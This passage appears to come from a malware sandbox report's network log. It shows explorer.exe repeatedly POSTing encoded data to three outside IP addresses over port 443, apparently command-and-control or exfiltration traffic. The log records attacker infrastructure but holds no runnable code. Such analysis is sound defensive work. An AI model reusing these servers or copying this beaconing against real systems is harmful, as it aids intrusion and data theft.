2024-07-27 05:45:54 UTC	1122	OUT	Data Raw: 66 4e 34 31 6d 5a 4b 70 31 73 33 73 78 63 69 49 70 2f 37 79 67 31 65 31 2f 5a 55 6e 56 63 4d 32 6f 4c 79 59 2f 61 4e 74 43 6d 48 52 47 52 64 4f 4a 52 33 6a 66 58 38 51 70 36 55 4e 4c 50 76 6a 59 4b 78 70 46 47 58 68 39 4e 55 74 49 30 63 30 71 6c 42 42 71 4a 6a 74 6c 48 66 6b 37 79 6f 6e 62 67 2b 65 4d 4b 5a 39 4c 47 51 6d 67 2b 50 44 66 6b 64 4a 37 77 75 63 6f 6f 79 67 55 4d 32 2b 78 75 76 54 73 4d 36 30 6e 58 38 68 55 53 53 7a 33 7a 56 67 4c 4d 54 38 2f 62 59 64 76 39 79 2f 6a 4d 45 76 63 30 32 76 32 76 4e 38 78 44 56 6f 35 69 6a 74 57 2b 41 63 68 6e 4a 77 64 30 73 49 31 6c 2f 43 49 35 4d 66 50 64 34 76 75 53 6f 37 41 68 59 4f 39 64 35 50 6b 42 76 43 73 73 75 36 59 78 68 79 49 4b 63 6a 67 36 42 41 77 53 63 6a 48 51 50 31 2b 69 50 4f 4c 66 2b 58 45 4e 57 Data Ascii: fN41mZKp1s3sxciIp/7yg1e1/ZUnVcM2oLyY/aNtCmHRGRdOJR3jfX8Qp6UNLPvjYKxpFGXh9NUtI0c0qlBBqJjtlHfk7yonbg+eMKZ9LGQmg+PDfkdJ7wucooygUM2+xuvTsM60nX8hUSSz3zVgLMT8/bYdv9y/jMEvc02v2vN8xDVo5ijtW+AchnJwd0sI1l/CI5MfPd4vuSo7AhYO9d5PkBvCssu6YxhyIKcjg6BAwScjHQP1+iPOLf+XENW
2024-07-27 05:45:56 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:56 UTC	685	IN	Data Raw: 79 71 45 43 6e 43 63 30 7a 69 72 58 61 62 71 75 73 35 6d 46 6e 55 33 49 78 64 76 6a 76 2b 31 54 53 34 4a 52 41 6a 51 4e 4d 43 65 33 57 54 47 55 6b 61 32 45 73 42 51 6d 55 39 77 75 31 53 5a 2f 33 4f 53 69 30 6b 76 43 50 50 50 64 52 51 48 54 4b 76 67 4f 71 64 67 65 4e 45 73 2b 78 51 30 77 4b 4f 34 2b 6e 45 51 78 37 6c 65 6a 50 43 58 4d 43 5a 59 2f 66 45 6e 67 38 38 71 53 63 36 6c 4f 2f 67 4f 7a 43 36 46 4e 4e 77 4b 46 32 62 37 64 6c 56 54 55 5a 71 45 6a 65 64 54 4c 67 2b 4a 43 79 42 34 6e 46 53 31 61 74 74 35 57 41 51 41 50 79 77 43 68 48 55 30 6b 66 39 50 53 4d 54 75 4d 6f 78 46 50 62 55 50 30 73 33 4a 31 6f 2b 6e 71 66 63 73 61 48 71 59 72 54 6d 54 34 41 47 50 61 6b 44 32 67 52 48 50 47 41 74 64 71 6c 30 4c 62 4d 50 6c 4c 38 6f 4d 70 55 33 52 6c 77 68 62 Data Ascii: yqECnCc0zirXabqus5mFnU3Ixdvjv+1TS4JRAjQNMCe3WTGUka2EsBQmU9wu1SZ/3OSi0kvCPPPdRQHTKvgOqdgeNEs+xQ0wKO4+nEQx7lejPCXMCZY/fEng88qSc6lO/gOzC6FNNwKF2b7dlVTUZqEjedTLg+JCyB4nFS1att5WAQAPywChHU0kf9PSMTuMoxFPbUP0s3J1o+nqfcsaHqYrTmT4AGPakD2gRHPGAtdql0LbMPlL8oMpU3Rlwhb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	62362	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:57 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:57 UTC	1122	OUT	Data Raw: 56 67 59 74 63 5a 61 54 30 74 45 71 6b 76 67 42 4c 57 6e 6e 79 33 4d 44 64 54 72 51 4a 42 43 6f 50 71 45 63 33 70 36 6d 54 64 53 4f 44 37 4d 39 78 67 75 34 65 5a 6e 31 69 58 5a 4d 37 41 59 42 47 76 44 6f 4b 4f 63 61 37 54 57 66 61 76 56 52 31 65 57 63 51 47 33 77 6e 48 53 48 77 2f 52 59 56 65 75 6f 5a 34 35 48 32 36 6e 4e 77 70 56 46 36 37 34 4c 53 38 75 57 44 42 53 2b 77 66 4d 49 4c 7a 61 2f 57 65 64 2b 52 2b 69 54 6d 6e 50 77 72 56 36 4a 31 52 76 76 7a 47 69 5a 66 6d 46 32 67 59 67 45 68 4b 6e 69 31 4b 31 31 57 55 59 52 32 66 62 55 55 48 36 4d 55 62 4c 45 43 41 45 72 46 64 51 76 35 6a 77 76 32 61 32 30 34 4e 6c 54 65 70 42 2b 61 39 63 33 4a 63 50 35 79 51 4b 7a 77 6c 78 4e 56 4e 35 4e 74 44 53 35 52 56 6a 58 6c 64 4c 4d 48 6d 52 55 4f 4c 49 69 44 6b 41 Data Ascii: VgYtcZaT0tEqkvgBLWnny3MDdTrQJBCoPqEc3p6mTdSOD7M9xgu4eZn1iXZM7AYBGvDoKOca7TWfavVR1eWcQG3wnHSHw/RYVeuoZ45H26nNwpVF674LS8uWDBS+wfMILza/Wed+R+iTmnPwrV6J1RvvzGiZfmF2gYgEhKni1K11WUYR2fbUUH6MUbLECAErFdQv5jwv2a204NlTepB+a9c3JcP5yQKzwlxNVN5NtDS5RVjXldLMHmRUOLIiDkA
2024-07-27 05:45:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:58 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:58 UTC	685	IN	Data Raw: 78 68 2f 65 57 4c 78 39 31 78 50 68 48 41 79 69 6d 7a 34 69 72 54 4e 69 32 42 62 75 32 58 4a 37 78 37 4f 37 5a 2b 2b 57 6b 46 38 76 42 47 7a 2b 6b 70 32 47 52 34 78 73 58 66 42 41 43 73 6d 69 79 48 79 57 59 70 48 47 7a 79 52 45 61 41 67 7a 74 7a 76 4f 34 4d 4c 6c 47 34 4c 4d 70 43 65 57 32 46 54 78 74 72 4e 46 70 6f 37 67 4f 51 69 69 57 48 58 42 79 36 4c 7a 6c 4f 78 45 73 6d 43 2f 39 4d 38 49 72 36 7a 66 41 6a 42 49 30 35 6d 62 32 6d 54 4b 37 63 37 4f 33 57 45 37 37 2b 37 73 35 42 46 4e 32 51 66 30 48 52 65 67 33 44 57 30 47 61 70 77 38 53 61 55 7a 52 31 74 69 6c 48 44 77 79 70 31 4e 4a 37 4d 4b 58 64 6e 6d 43 41 32 5a 37 47 79 58 62 73 6e 67 51 38 38 55 68 4c 4b 52 4a 41 39 78 37 78 6b 54 6d 5a 45 30 62 72 76 57 2b 65 2b 4e 4a 77 39 39 6c 39 61 74 71 58 Data Ascii: xh/eWLx91xPhHAyimz4irTNi2Bbu2XJ7x7O7Z++WkF8vBGz+kp2GR4xsXfBACsmiyHyWYpHGzyREaAgztzvO4MLlG4LMpCeW2FTxtrNFpo7gOQiiWHXBy6LzlOxEsmC/9M8Ir6zfAjBI05mb2mTK7c7O3WE77+7s5BFN2Qf0HReg3DW0Gapw8SaUzR1tilHDwyp1NJ7MKXdnmCA2Z7GyXbsngQ88UhLKRJA9x7xkTmZE0brvW+e+NJw99l9atqX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	62363	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:59 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:59 UTC	1122	OUT	Data Raw: 41 56 44 37 50 2f 50 35 77 63 4d 76 68 37 76 54 6b 79 74 6a 46 6d 73 6b 46 30 43 4a 4a 66 59 39 49 61 73 33 65 58 76 63 6c 70 38 52 4e 31 50 4d 71 6d 7a 42 69 36 2f 38 52 44 72 35 32 4a 68 44 4e 71 4e 54 49 38 63 64 54 41 66 72 65 70 74 68 72 62 6a 73 42 72 48 6e 33 6d 68 66 61 62 78 51 39 6d 74 59 41 52 65 58 35 38 5a 61 41 6e 58 39 55 6c 57 31 4c 58 39 59 77 55 58 73 48 72 68 68 64 4d 6a 7a 35 6e 64 2b 6e 36 34 5a 43 49 33 4d 51 46 30 6a 62 72 45 75 30 59 54 36 46 33 2b 4f 7a 64 51 6b 5a 62 6d 52 73 41 78 74 43 68 55 59 42 43 32 75 54 70 57 47 54 62 64 75 35 6b 45 50 6c 36 79 4f 4a 42 54 32 49 50 55 52 38 51 35 47 72 4f 32 41 69 33 63 38 58 4c 50 56 6d 70 33 49 32 66 74 70 30 37 6e 58 65 76 4d 39 74 66 68 37 79 55 47 62 51 78 63 64 6e 56 4c 47 56 70 33 Data Ascii: AVD7P/P5wcMvh7vTkytjFmskF0CJJfY9Ias3eXvclp8RN1PMqmzBi6/8RDr52JhDNqNTI8cdTAfrepthrbjsBrHn3mhfabxQ9mtYAReX58ZaAnX9UlW1LX9YwUXsHrhhdMjz5nd+n64ZCI3MQF0jbrEu0YT6F3+OzdQkZbmRsAxtChUYBC2uTpWGTbdu5kEPl6yOJBT2IPUR8Q5GrO2Ai3c8XLPVmp3I2ftp07nXevM9tfh7yUGbQxcdnVLGVp3
2024-07-27 05:46:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:00 UTC	685	IN	Data Raw: 65 76 36 52 47 73 6e 52 53 30 47 7a 46 51 33 54 48 47 4b 46 6e 35 69 6c 4f 47 58 62 31 63 6d 54 54 72 54 38 76 2f 72 7a 68 71 53 52 58 71 43 53 4c 32 54 7a 35 49 30 4d 48 72 41 7a 67 35 6c 4e 43 41 74 76 46 47 6e 6e 65 4b 34 6b 56 30 6d 43 6a 48 53 64 44 39 64 77 4c 66 6e 46 57 35 74 58 2f 66 46 72 38 51 6a 44 58 70 66 75 41 51 70 6a 71 62 75 77 68 5a 2b 46 76 45 41 2b 66 52 4d 6c 59 35 6b 37 34 4e 56 61 4c 72 4b 2f 48 33 73 4a 6d 57 50 45 7a 41 70 68 6c 76 36 4f 62 41 41 52 6b 70 7a 6a 42 45 68 52 43 58 41 68 38 69 71 71 46 63 44 54 45 4e 58 6c 50 30 4c 4b 54 56 57 41 77 45 6e 6f 7a 6f 74 74 39 43 4a 41 4a 2f 64 35 48 52 5a 55 38 38 35 37 55 49 31 6c 59 6c 31 5a 6d 73 36 43 31 58 39 78 32 45 77 4a 4b 76 31 73 39 42 74 61 45 71 32 58 4c 52 4b 68 56 38 69 Data Ascii: ev6RGsnRS0GzFQ3THGKFn5ilOGXb1cmTTrT8v/rzhqSRXqCSL2Tz5I0MHrAzg5lNCAtvFGnneK4kV0mCjHSdD9dwLfnFW5tX/fFr8QjDXpfuAQpjqbuwhZ+FvEA+fRMlY5k74NVaLrK/H3sJmWPEzAphlv6ObAARkpzjBEhRCXAh8iqqFcDTENXlP0LKTVWAwEnozott9CJAJ/d5HRZU8857UI1lYl1Zms6C1X9x2EwJKv1s9BtaEq2XLRKhV8i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	62364	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:01 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:01 UTC	1267	OUT	Data Raw: 47 74 2b 2f 6e 52 6f 71 41 48 34 70 46 67 54 6b 47 4f 59 46 58 76 32 49 46 39 6c 75 77 68 75 34 54 63 77 39 42 35 4e 6a 77 4b 44 54 44 2b 4d 42 4f 65 69 49 4b 55 6e 73 61 48 33 6f 62 36 44 59 53 49 7a 61 51 68 43 38 38 62 76 70 4d 6c 7a 6c 65 72 69 6c 70 43 62 69 68 6d 74 46 53 59 41 42 53 67 62 43 6b 39 4a 57 49 58 33 43 31 47 6c 30 68 47 71 58 31 4f 56 31 44 48 69 69 53 33 32 4c 34 45 54 4e 53 36 6a 56 4b 51 79 72 78 37 6a 66 48 4e 45 64 47 6d 49 70 55 68 2f 70 4d 78 4d 74 74 74 59 6d 43 59 4b 74 59 38 72 53 4d 2b 73 4b 59 42 2f 45 77 78 63 6e 4e 39 71 4c 64 43 34 41 55 56 45 63 51 45 51 62 6f 72 69 74 51 7a 65 72 78 31 45 4f 79 4f 33 37 4e 58 74 56 74 69 48 41 79 67 63 79 47 47 4c 75 37 74 2f 48 71 2f 2f 51 37 64 4c 71 4e 67 51 44 4e 61 6d 64 66 56 32 Data Ascii: Gt+/nRoqAH4pFgTkGOYFXv2IF9luwhu4Tcw9B5NjwKDTD+MBOeiIKUnsaH3ob6DYSIzaQhC88bvpMlzlerilpCbihmtFSYABSgbCk9JWIX3C1Gl0hGqX1OV1DHiiS32L4ETNS6jVKQyrx7jfHNEdGmIpUh/pMxMtttYmCYKtY8rSM+sKYB/EwxcnN9qLdC4AUVEcQEQboritQzerx1EOyO37NXtVtiHAygcyGGLu7t/Hq//Q7dLqNgQDNamdfV2
2024-07-27 05:46:02 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:02 UTC	685	IN	Data Raw: 59 55 56 34 55 6d 61 48 35 4d 50 72 63 57 61 50 75 4f 2f 34 66 57 64 69 30 36 71 52 49 44 73 6d 66 65 4e 59 73 56 79 44 42 48 2f 4a 79 51 59 58 72 75 7a 51 6e 41 45 75 63 69 50 77 45 51 64 44 6c 45 2b 76 59 38 50 37 4e 61 76 59 42 7a 4b 66 78 78 56 5a 47 57 56 6c 62 64 7a 77 44 5a 66 59 7a 2f 74 4a 46 4c 36 39 2f 69 51 33 5a 61 34 6e 52 68 64 6a 44 42 42 78 64 48 76 46 48 78 36 6c 54 73 54 43 42 6a 41 69 51 35 49 79 78 4e 52 61 4d 77 79 7a 33 44 44 50 38 59 71 6a 73 51 70 50 7a 48 38 66 76 46 58 52 77 55 54 61 44 42 5a 73 62 72 49 62 58 7a 76 54 57 70 34 73 4d 49 39 47 70 70 4b 68 47 34 4c 31 4d 68 2b 41 47 6f 68 53 4c 48 6e 74 41 66 4d 70 39 6e 4a 46 62 71 42 5a 67 4a 78 6e 4a 4c 41 77 74 32 38 63 6f 78 46 46 32 52 58 2b 73 33 4e 65 6b 73 7a 2b 31 51 6e Data Ascii: YUV4UmaH5MPrcWaPuO/4fWdi06qRIDsmfeNYsVyDBH/JyQYXruzQnAEuciPwEQdDlE+vY8P7NavYBzKfxxVZGWVlbdzwDZfYz/tJFL69/iQ3Za4nRhdjDBBxdHvFHx6lTsTCBjAiQ5IyxNRaMwyz3DDP8YqjsQpPzH8fvFXRwUTaDBZsbrIbXzvTWp4sMI9GppKhG4L1Mh+AGohSLHntAfMp9nJFbqBZgJxnJLAwt28coxFF2RX+s3Neksz+1Qn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	62365	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:03 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:03 UTC	1267	OUT	Data Raw: 6a 4c 52 4d 66 71 45 34 33 68 78 35 49 35 57 42 68 6d 31 30 73 6d 77 6f 74 6f 78 31 32 61 4a 6f 58 65 70 70 45 2b 4a 36 75 73 67 73 31 47 57 5a 69 64 4a 6a 42 57 75 62 5a 61 2f 55 35 74 31 44 36 75 6a 4d 43 47 78 76 58 76 43 76 37 53 41 30 68 47 39 69 44 36 45 62 68 5a 45 6d 76 4f 34 56 59 35 33 31 4b 77 42 6b 69 47 49 48 73 6a 45 53 4c 53 54 7a 70 68 67 70 38 6b 55 32 75 53 34 58 6a 4e 34 48 49 39 53 77 53 74 67 55 4c 56 74 52 55 31 42 7a 61 68 69 4c 74 72 54 67 4a 4c 65 36 2f 4b 67 6f 39 6b 31 39 35 6e 5a 44 31 43 73 57 6e 65 37 67 48 69 78 46 6e 79 62 74 58 61 52 70 66 54 4b 37 67 51 75 53 51 52 79 65 4f 58 2f 65 38 57 38 4d 70 49 48 52 56 7a 4e 76 2b 63 45 34 36 62 6e 59 35 79 54 45 37 70 77 67 57 6c 6e 73 78 77 71 6f 7a 68 45 4f 59 52 39 6e 50 71 48 Data Ascii: jLRMfqE43hx5I5WBhm10smwotox12aJoXeppE+J6usgs1GWZidJjBWubZa/U5t1D6ujMCGxvXvCv7SA0hG9iD6EbhZEmvO4VY531KwBkiGIHsjESLSTzphgp8kU2uS4XjN4HI9SwStgULVtRU1BzahiLtrTgJLe6/Kgo9k195nZD1CsWne7gHixFnybtXaRpfTK7gQuSQRyeOX/e8W8MpIHRVzNv+cE46bnY5yTE7pwgWlnsxwqozhEOYR9nPqH
2024-07-27 05:46:04 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:04 UTC	685	IN	Data Raw: 56 4a 58 70 2b 50 58 30 34 63 47 56 7a 75 34 4c 77 50 57 4d 49 31 56 30 6e 47 78 6f 35 2f 6d 30 73 6c 6a 4f 47 57 56 39 70 56 38 57 48 32 7a 78 54 4e 47 52 30 6d 47 57 79 72 54 6b 50 72 6c 32 4f 36 76 36 53 2b 69 72 49 66 6c 70 73 68 79 73 75 69 41 2f 51 37 61 77 38 73 6b 70 53 4d 79 31 45 32 51 41 62 6e 76 70 6a 61 37 31 61 6d 72 38 32 67 76 4e 70 62 79 63 4e 6d 49 5a 55 74 6a 4a 65 49 56 5a 6f 73 56 61 63 47 37 52 72 38 4e 68 44 75 74 51 31 6a 4f 55 49 73 32 61 6c 77 30 64 39 75 69 34 61 41 4b 79 41 61 54 30 4b 64 52 36 45 67 4c 67 59 69 7a 67 41 30 75 68 43 71 77 49 74 6b 6e 34 51 73 78 52 45 6d 4a 39 2b 6b 61 66 4e 4a 4c 47 72 36 69 4f 7a 49 37 6b 6f 76 67 43 57 37 65 56 2f 46 62 53 79 54 6c 33 51 49 64 51 51 39 6e 6e 43 31 52 64 50 52 65 62 51 5a 79 Data Ascii: VJXp+PX04cGVzu4LwPWMI1V0nGxo5/m0sljOGWV9pV8WH2zxTNGR0mGWyrTkPrl2O6v6S+irIflpshysuiA/Q7aw8skpSMy1E2QAbnvpja71amr82gvNpbycNmIZUtjJeIVZosVacG7Rr8NhDutQ1jOUIs2alw0d9ui4aAKyAaT0KdR6EgLgYizgA0uhCqwItkn4QsxREmJ9+kafNJLGr6iOzI7kovgCW7eV/FbSyTl3QIdQQ9nnC1RdPRebQZy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	62367	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:05 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:05 UTC	1122	OUT	Data Raw: 6d 37 37 76 4b 6b 65 74 4a 68 76 63 76 59 2f 7a 64 5a 4d 6a 68 45 4f 71 48 52 44 58 37 72 72 71 71 55 2f 33 76 31 73 79 47 74 7a 53 6e 61 43 4c 53 77 6e 36 45 47 38 4c 6b 43 4a 6f 77 4b 45 4f 30 38 63 75 6b 54 56 66 34 65 67 30 54 57 47 2f 58 67 4c 4e 54 74 79 49 6a 71 74 54 45 77 78 37 56 75 74 75 37 78 30 63 55 2f 35 76 63 6f 31 49 33 37 6d 34 2f 4e 63 4c 54 6b 2f 44 63 4a 4d 2b 6f 6d 46 57 56 68 62 4a 2b 6b 69 2b 4f 4b 67 46 4d 6f 46 37 65 49 33 52 78 54 45 31 65 2b 45 34 57 56 52 59 46 2b 4e 68 56 69 37 63 4e 34 74 46 6f 63 62 61 55 51 73 6c 47 5a 4b 6c 49 67 45 54 56 77 4b 62 35 4f 4d 79 6b 73 66 6a 76 30 4c 4c 4b 66 36 2b 69 4e 4f 77 54 73 50 48 47 35 49 54 77 73 4a 6a 6b 30 57 35 77 50 61 48 49 62 74 6a 75 7a 6e 4e 59 36 61 39 47 6c 59 31 45 32 76 Data Ascii: m77vKketJhvcvY/zdZMjhEOqHRDX7rrqqU/3v1syGtzSnaCLSwn6EG8LkCJowKEO08cukTVf4eg0TWG/XgLNTtyIjqtTEwx7Vutu7x0cU/5vco1I37m4/NcLTk/DcJM+omFWVhbJ+ki+OKgFMoF7eI3RxTE1e+E4WVRYF+NhVi7cN4tFocbaUQslGZKlIgETVwKb5OMyksfjv0LLKf6+iNOwTsPHG5ITwsJjk0W5wPaHIbtjuznNY6a9GlY1E2v
2024-07-27 05:46:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:06 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:06 UTC	685	IN	Data Raw: 44 39 65 6c 6d 42 4d 41 50 67 4e 37 78 72 59 55 48 6c 35 56 68 63 37 37 58 4d 32 2f 57 61 68 76 4c 6f 4c 73 73 47 51 50 59 70 6e 64 6d 56 74 41 30 7a 71 39 4d 62 36 64 79 6f 79 35 44 53 2b 37 36 42 47 50 66 36 69 33 7a 63 6a 47 6e 44 4a 67 46 2b 5a 52 52 32 6c 56 77 58 30 4d 2b 52 6b 63 2f 71 32 34 76 63 44 42 2b 31 49 66 33 4b 77 6f 79 6c 6d 71 47 6e 78 44 47 54 62 75 33 61 57 2f 54 66 69 74 43 52 69 6c 49 31 30 44 71 72 44 63 42 63 6a 33 44 50 38 4d 49 6e 4f 55 71 67 72 71 70 4e 36 54 54 2f 42 41 61 6f 65 6f 59 56 78 48 36 55 76 6f 54 61 55 71 74 4a 39 52 74 73 4d 56 54 4c 71 31 76 34 39 32 38 4c 69 62 2b 39 32 78 46 35 72 75 76 71 6c 75 61 36 64 36 66 66 48 4a 43 4e 44 4a 44 75 64 30 5a 44 6a 58 35 37 6c 76 6f 30 55 39 6f 4c 59 6c 57 78 4c 68 33 6b 41 Data Ascii: D9elmBMAPgN7xrYUHl5Vhc77XM2/WahvLoLssGQPYpndmVtA0zq9Mb6dyoy5DS+76BGPf6i3zcjGnDJgF+ZRR2lVwX0M+Rkc/q24vcDB+1If3KwoylmqGnxDGTbu3aW/TfitCRilI10DqrDcBcj3DP8MInOUqgrqpN6TT/BAaoeoYVxH6UvoTaUqtJ9RtsMVTLq1v4928Lib+92xF5ruvqlua6d6ffHJCNDJDud0ZDjX57lvo0U9oLYlWxLh3kA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	62368	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:07 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:07 UTC	1122	OUT	Data Raw: 49 46 48 30 72 39 65 49 77 50 79 36 31 36 6b 4c 42 63 55 7a 50 71 64 4a 2b 44 32 4e 39 63 52 6b 6f 6e 45 53 2b 79 4d 32 34 57 61 2b 48 65 44 45 71 70 6d 71 54 54 56 43 4b 49 78 69 46 77 57 64 67 52 4b 6c 31 6f 67 45 74 76 6f 4b 37 70 4d 51 77 48 39 72 31 30 63 4f 2b 2b 71 37 72 41 35 4c 54 4b 67 32 68 6a 4a 62 51 6f 55 58 74 6c 47 36 70 68 38 72 68 64 50 4d 51 36 4b 78 53 7a 52 42 79 37 66 6d 56 72 34 6a 4f 36 32 77 43 45 7a 6b 6e 51 53 45 34 51 50 41 34 6a 57 49 44 7a 41 65 45 6c 36 61 65 79 53 38 6c 45 43 34 6b 46 46 48 44 49 41 4e 78 68 70 56 56 78 57 57 7a 2b 32 37 50 72 78 32 4d 6b 5a 4d 4d 4f 78 4e 32 2f 37 6c 72 66 73 56 6a 62 4b 35 66 6e 31 41 39 63 2b 50 76 4f 53 67 71 68 46 58 36 50 6b 55 42 30 4b 6d 57 6a 71 59 72 56 48 4b 43 49 38 63 50 43 41 Data Ascii: IFH0r9eIwPy616kLBcUzPqdJ+D2N9cRkonES+yM24Wa+HeDEqpmqTTVCKIxiFwWdgRKl1ogEtvoK7pMQwH9r10cO++q7rA5LTKg2hjJbQoUXtlG6ph8rhdPMQ6KxSzRBy7fmVr4jO62wCEzknQSE4QPA4jWIDzAeEl6aeyS8lEC4kFFHDIANxhpVVxWWz+27Prx2MkZMMOxN2/7lrfsVjbK5fn1A9c+PvOSgqhFX6PkUB0KmWjqYrVHKCI8cPCA
2024-07-27 05:46:08 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:08 UTC	685	IN	Data Raw: 6b 70 44 44 66 42 65 62 38 39 74 72 39 49 45 55 64 6a 5a 74 56 31 34 59 55 70 62 61 4e 31 34 32 67 76 4c 7a 44 5a 70 45 35 50 6c 4a 77 63 65 33 72 45 57 75 34 66 2b 48 79 55 59 78 67 74 4f 69 32 33 76 76 68 75 76 2b 35 2b 68 53 78 42 48 6c 61 66 74 31 68 4f 6f 44 4f 70 4d 73 30 4d 45 58 53 41 74 33 65 6a 6c 48 57 4e 37 4c 4c 56 49 42 33 56 4c 6d 68 43 31 32 71 4d 4c 42 63 48 32 42 62 5a 71 39 6a 74 5a 61 72 43 39 52 65 46 2b 32 30 4f 49 5a 47 51 4b 6f 57 49 58 6b 34 67 6a 42 46 77 50 34 68 34 6b 51 6b 57 43 66 38 73 4d 73 44 49 33 72 35 55 48 71 76 30 30 63 62 56 61 70 73 4f 52 41 2f 77 31 4f 61 4a 36 58 65 49 79 6c 66 44 35 6d 4a 42 2f 7a 56 34 46 4f 4a 31 78 79 75 44 48 66 43 37 79 64 51 55 6d 32 77 4c 36 59 33 66 50 5a 79 63 32 54 77 36 59 36 4e 53 78 Data Ascii: kpDDfBeb89tr9IEUdjZtV14YUpbaN142gvLzDZpE5PlJwce3rEWu4f+HyUYxgtOi23vvhuv+5+hSxBHlaft1hOoDOpMs0MEXSAt3ejlHWN7LLVIB3VLmhC12qMLBcH2BbZq9jtZarC9ReF+20OIZGQKoWIXk4gjBFwP4h4kQkWCf8sMsDI3r5UHqv00cbVapsORA/w1OaJ6XeIylfD5mJB/zV4FOJ1xyuDHfC7ydQUm2wL6Y3fPZyc2Tw6Y6NSx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	62369	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:09 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:09 UTC	1122	OUT	Data Raw: 46 2b 74 72 6b 70 4d 76 48 32 75 6f 32 30 53 79 34 63 51 48 63 50 79 54 48 2b 5a 43 54 4f 58 51 41 4a 4d 77 6b 78 44 46 41 33 6f 59 37 4a 6e 54 2f 35 4a 78 43 62 5a 2f 6c 35 2f 67 67 78 72 73 6c 52 41 65 65 32 53 4d 54 7a 5a 6e 78 2f 75 4d 74 57 33 37 37 6a 6f 75 65 78 7a 50 4a 30 74 6c 58 67 4e 4f 47 42 46 67 76 7a 6a 77 56 38 6a 59 49 5a 69 63 4d 56 31 78 4e 45 47 4f 65 45 2b 31 33 71 67 5a 46 4e 58 32 6f 38 76 57 37 64 79 78 73 69 43 5a 67 39 55 54 42 75 57 71 32 37 78 75 68 2b 69 72 62 72 39 33 56 62 73 49 31 57 64 65 35 43 66 2b 69 64 6c 56 33 79 73 61 75 68 54 43 4f 6e 70 34 50 78 6d 2f 65 49 53 7a 6d 5a 6d 79 79 61 38 78 73 59 71 31 63 39 31 50 39 2f 54 54 34 35 43 33 70 41 50 64 74 49 49 38 44 6e 52 31 67 36 48 55 66 5a 59 45 53 49 47 34 51 2b 64 Data Ascii: 